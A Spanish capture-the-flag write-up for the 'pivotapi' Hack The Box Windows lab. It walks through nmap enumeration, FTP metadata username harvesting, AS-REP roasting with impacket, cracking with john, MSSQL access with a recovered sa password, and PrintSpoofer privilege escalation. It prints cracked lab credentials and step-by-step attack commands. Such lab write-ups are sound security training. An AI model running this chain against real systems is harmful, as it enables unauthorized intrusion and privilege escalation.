# pivotapi

**OS**: Windows \
**Dificultad**: Insano
**Puntos**: 50

## Resumen

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.240`

```
Nmap scan report for 10.10.10.240
Host is up (0.074s latency).
Not shown: 986 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  01:18PM               219091 notes1.pdf
| 08-08-20  01:34PM               279445 notes2.pdf
| 08-08-20  01:41PM                  105 README.txt
|_02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-24 17:06:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: LICORDEBELLOTA
|   NetBIOS_Domain_Name: LICORDEBELLOTA
|   NetBIOS_Computer_Name: PIVOTAPI
|   DNS_Domain_Name: LicorDeBellota.htb
|   DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|   DNS_Tree_Name: LicorDeBellota.htb
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-05-24T16:57:37
|_Not valid after:  2051-05-24T16:57:37
|_ssl-date: 2021-05-24T17:07:13+00:00; +10m46s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 10m45s, deviation: 0s, median: 10m45s
| ms-sql-info: 
|   10.10.10.240:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-24T17:06:34
|_  start_date: N/A
```

## Enumeración

`ftp -p 10.10.10.240`
`get README.txt`

![1](img/1.png)

`cat README.txt`

![2](img/2.png)

- `binary`
- `mget *`

![3](img/3.png)

`exiftool notes2.pdf`

![4](img/4.png)

`exiftool * | grep Creator | awk '{print $3}' > userlist.txt`

![5](img/5.png)

`python3 /opt/impacket/examples/GetNPUsers.py LicorDeBellota.htb/ -usersfile userlist.txt -dc-ip 10.10.10.240`

![6](img/6.png)

`john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![7](img/7.png)

```
Kaorz : Roper4155
```

`smbmap -u Kaorz -p Roper4155 -H 10.10.10.240`

![8](img/8.png)

- `smbclient //10.10.10.240/NETLOGON -U Kaorz`
- `cd HelpDesk\`
- `get Restart-OracleService.exe`
- `get "Server MSSQL.msg"`
- `get "WinRM Service.msg"`

![9](img/9.png)

`apt install libemail-outlook-message-perl`
`msgconvert Server\ MSSQL.msg`
`msgconvert WinRM\ Service.msg`

![10](img/10.png)

##### Server MSSQL.msg
```
Good afternoon,
 
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
 
Any doubt do not hesitate to contact us.
 
Greetings,
 
The HelpDesk Team
```

##### WinRM Service.msg
```
Good afternoon.
 
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,
 
The HelpDesk Team
```




## Escalada de Privilegios (User)

`python3 /opt/impacket/examples/mssqlclient.py sa@10.10.10.240`

```
sa:#mssql_s3rV1c3!2020
```

## Escalada de Privilegios (Root)

- `python3 mssql_shell.py`
- `whoami /priv`

> Modificar la siguiente linea: \
    b64enc_data = b"".join(base64.encodestring(data).split()).decode() \
    b64enc_data = b"".join(base64.b64encode(data).split()).decode()

- `cd c:\`
- `mkdir temp`
- `cd temp`
- `UPLOAD PrintSpoofer.exe c:\temp\PrintSpoofer.exe`

- `printspoofer.exe -i -c "powershell -c type C:\Users\3v4Si0N\Desktop\user.txt"`
- `printspoofer.exe -i -c "powershell -c type C:\users\cybervaca\Desktop\root.txt"`

## Referencias
https://exiftool.org/ \
https://github.com/SecureAuthCorp/impacket \
https://superuser.com/questions/99250/opening-a-msg-file-in-ubuntu \
https://docs.microsoft.com/en-us/sysinternals/downloads/procmon \
https://www.kahusecurity.com/tools.html \
http://www.rohitab.com/apimonitor \
https://github.com/Alamot/code-snippets/blob/master/mssql/mssql_shell.py \
https://github.com/dievus/printspoofer